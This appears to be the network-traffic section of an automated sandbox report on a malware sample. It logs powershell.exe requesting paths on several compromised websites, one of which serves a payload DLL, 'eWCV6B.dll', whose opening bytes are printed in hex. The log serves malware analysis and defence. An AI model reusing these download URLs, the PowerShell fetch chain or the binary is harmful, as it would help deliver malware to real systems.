                                                                    Data Raw: 31 30 64 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77
                                                                    Data Ascii: 10d8<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="w
                                                                    Jan 24, 2021 18:03:27.612776041 CET3INData Raw: 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72
                                                                    Data Ascii: idth=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styl
                                                                    Jan 24, 2021 18:03:27.612808943 CET4INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73
                                                                    Data Ascii: div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustw
                                                                    Jan 24, 2021 18:03:27.612844944 CET5INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66
                                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
                                                                    Jan 24, 2021 18:03:27.612879992 CET5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.2249166166.62.10.3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 24, 2021 18:03:27.908679008 CET6OUTGET /js/q26/ HTTP/1.1
                                                                    Host: silkonbusiness.matrixinfotechsolution.com
                                                                    Connection: Keep-Alive
                                                                    Jan 24, 2021 18:03:28.149194002 CET7INHTTP/1.1 404 Not Found
                                                                    Date: Sun, 24 Jan 2021 17:03:28 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Keep-Alive: timeout=5
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.224917145.143.97.18380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 24, 2021 18:03:29.975642920 CET10OUTGET /wp-includes/fz/ HTTP/1.1
                                                                    Host: armakonarms.com
                                                                    Connection: Keep-Alive
                                                                    Jan 24, 2021 18:03:30.521126032 CET12INHTTP/1.1 404 Not Found
                                                                    Connection: Keep-Alive
                                                                    X-Powered-By: PHP/7.3.22
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://armakonarms.com/wp-json/>; rel="https://api.w.org/"
                                                                    Transfer-Encoding: chunked
                                                                    Date: Sun, 24 Jan 2021 17:03:30 GMT
                                                                    Server: LiteSpeed
                                                                    Data Raw: 35 38 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 41 72 6d 61 6b 6f 6e 20 41 72 6d 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 72 6d 61 6b 6f 6e 20 41 72 6d 73 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 6d 61 6b 6f 6e 61 72 6d 73 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 72 6d 61 6b 6f 6e 20 41 72 6d 73 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 6d 61 6b 6f 6e 61 72 6d 73 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 31 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 31 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61 72 6d 61 6b 6f 6e 61 72 6d 73 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 36 22 7d 7d 3b 0a 09 09 09 21 66 75 6e
                                                                    Data Ascii: 5867<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Sayfa bulunamad &#8211; Armakon Arms</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Armakon Arms &raquo; beslemesi" href="https://armakonarms.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Armakon Arms &raquo; yorum beslemesi" href="https://armakonarms.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/armakonarms.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6"}};!fun
                                                                    Jan 24, 2021 18:03:30.521193027 CET13INData Raw: 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 6f 2c 69 2c 70 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 73 3d 70 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 70 2e 67 65 74 43 6f 6e 74 65 78 74 28
                                                                    Data Ascii: ction(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.wi
                                                                    Jan 24, 2021 18:03:30.521224022 CET14INData Raw: 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e
                                                                    Data Ascii: .supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onl
                                                                    Jan 24, 2021 18:03:30.521255970 CET16INData Raw: 6c 65 2e 63 73 73 3f 76 65 72 3d 34 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d
                                                                    Data Ascii: le.css?ver=4.0.0' type='text/css' media='all' /><link rel='stylesheet' id='woocommerce-layout-css' href='http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1' type='text/css' media='all' /><link
                                                                    Jan 24, 2021 18:03:30.521296978 CET17INData Raw: 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 33 36 36 64 36 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 20 2e 73 69 6e 67 6c 65 2d 70 6f 73 74 2d 63 6f 6e 74 61 69 6e
                                                                    Data Ascii: olor-background-color{ background-color: #0366d6!important; } .single-post-container .alignfull > [class*="__inner-container"], .single-post-container .alignwide > [class*="__inner-container"]{ max-width:718px } .single-product .alignfull > [c
                                                                    Jan 24, 2021 18:03:30.521338940 CET18INData Raw: 61 6c 74 2e 73 69 6e 67 6c 65 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 63 74 69 6f 6e 73 20 3e 20 62 75 74 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 20 2e 77 6f 6f 63 6f
                                                                    Data Ascii: alt.single_add_to_cart_button, .woocommerce .actions > button[type=submit], .woocommerce button#place_order, .woocommerce .return-to-shop > .button, .button.woocommerce-form-login__submit,.woocommerce #review_form #respond input#submit, .wooco
                                                                    Jan 24, 2021 18:03:30.521404982 CET20INData Raw: 28 2e 6d 6f 72 65 2d 64 65 74 61 69 6c 73 29 3a 6e 6f 74 28 2e 63 68 65 63 6b 6f 75 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f
                                                                    Data Ascii: (.more-details):not(.checkout-button):hover, .woocommerce a.button.alt:hover, .woocommerce a.button.button-primary:hover, .woocommerce button.button:disabled:hover, .woocommerce button.button:disabled[disabled]:hover, .woocommerce a.button.add
                                                                    Jan 24, 2021 18:03:30.521460056 CET21INData Raw: 6c 65 2d 73 65 63 6f 6e 64 61 72 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 20 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70
                                                                    Data Ascii: le-secondary .wp-block-button__link ,.woocommerce-cart table.cart td.actions .coupon > .input-text + .button, .woocommerce-checkout #neve-checkout-coupon .woocommerce-form-coupon .form-row-last button, .woocommerce button.button:not(.single_ad
                                                                    Jan 24, 2021 18:03:30.521497965 CET23INData Raw: 61 73 74 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6e 76 2d 74 65 78 74 2d 63 6f 6c 6f
                                                                    Data Ascii: ast button.button:hover{ background-color: rgba(0,0,0,0);color: var(--nv-text-color); } .woocommerce-mini-cart__buttons .button.checkout{ background-color: #0366d6;color: #ffffff;border-radius:3px 3px 3px 3px;border:none;border-width:1px 1px 1
                                                                    Jan 24, 2021 18:03:30.521548986 CET24INData Raw: 2d 73 65 6c 6c 73 20 3e 20 68 32 2c 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 5f 68 65 61 64 69 6e 67 7b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 74 65 78 74 2d 74 72
                                                                    Data Ascii: -sells > h2, #order_review_heading{ letter-spacing: 0px; font-weight: 400; text-transform: none; font-family: Asap Condensed, var(--nv-fallback-ff); } form:not([role="search"]):not(.woocommerce-cart-form):not(.woocommerce-ordering):not(.cart)
                                                                    Jan 24, 2021 18:03:30.570323944 CET25INData Raw: 64 65 72 2d 6d 61 69 6e 2d 69 6e 6e 65 72 20 2e 6e 61 76 2d 75 6c 20 2e 73 75 62 2d 6d 65 6e 75 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 7d 20 2e 68 66 67 5f 68 65 61 64 65 72 20 2e 68 65 61 64 65 72
                                                                    Data Ascii: der-main-inner .nav-ul .sub-menu{ background-color: #ffffff; } .hfg_header .header-main-inner{ background-color: #ffffff; } .header-bottom-inner,.header-bottom-inner a:not(.button),.header-bottom-inner .navbar-toggle{ color: var(--nv-text-colo


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.2249172162.241.61.20380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 24, 2021 18:03:30.944920063 CET55OUTGET /t/2/ HTTP/1.1
                                                                    Host: alugrama.com.mx
                                                                    Connection: Keep-Alive
                                                                    Jan 24, 2021 18:03:31.210002899 CET56INHTTP/1.1 200 OK
                                                                    Date: Sun, 24 Jan 2021 17:03:31 GMT
                                                                    Server: Apache
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Sun, 24 Jan 2021 17:03:31 GMT
                                                                    Content-Disposition: attachment; filename="eWCV6B.dll"
                                                                    Content-Transfer-Encoding: binary
                                                                    Set-Cookie: 600da863225b4=1611507811; expires=Sun, 24-Jan-2021 17:04:31 GMT; Max-Age=60; path=/
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, Keep-Alive
                                                                    Last-Modified: Sun, 24 Jan 2021 17:03:31 GMT
                                                                    Vary: Accept-Encoding
                                                                    Keep-Alive: timeout=5, max=75
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: application/octet-stream
                                                                    Data Raw: 33 64 30 38 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 86 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 fa 04 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 18 c6 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 05 00 58 15 00 00 00 a0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 14 ed 04 00 00 70 00 00 00 ee 04 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 60 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 70 05 00 00 02 00 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 a0 05 00 00 04 00 00 00 38 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: 3d08MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B
                                                                    Jan 24, 2021 18:03:31.210056067 CET58INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Jan 24, 2021 18:03:31.210103035 CET59INData Raw: cc cc cc cc 55 8b ec 51 c7 45 fc 2b 02 00 00 8b 45 08 8b 40 50 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 a1 cc 63 00 10 8b 48 fc 89 4d fc 8b 55 fc 89 15 8c 63 00 10 8b 45 fc 8b e5 5d c3 cc 55 8b ec 83 ec 0c a1 00 62 00 10 89 45 f4
                                                                    Data Ascii: UQE+E@P]UQcHMUcE]UbEE`MU3MUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@MQ3EPMAUB3M
                                                                    Jan 24, 2021 18:03:31.210149050 CET60INData Raw: fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00
                                                                    Data Ascii: AEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAMc-chx`h(db(dJu
                                                                    Jan 24, 2021 18:03:31.210186958 CET62INData Raw: 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45
                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E
                                                                    Jan 24, 2021 18:03:31.210225105 CET63INData Raw: 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8
                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E
                                                                    Jan 24, 2021 18:03:31.210263968 CET64INData Raw: 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a
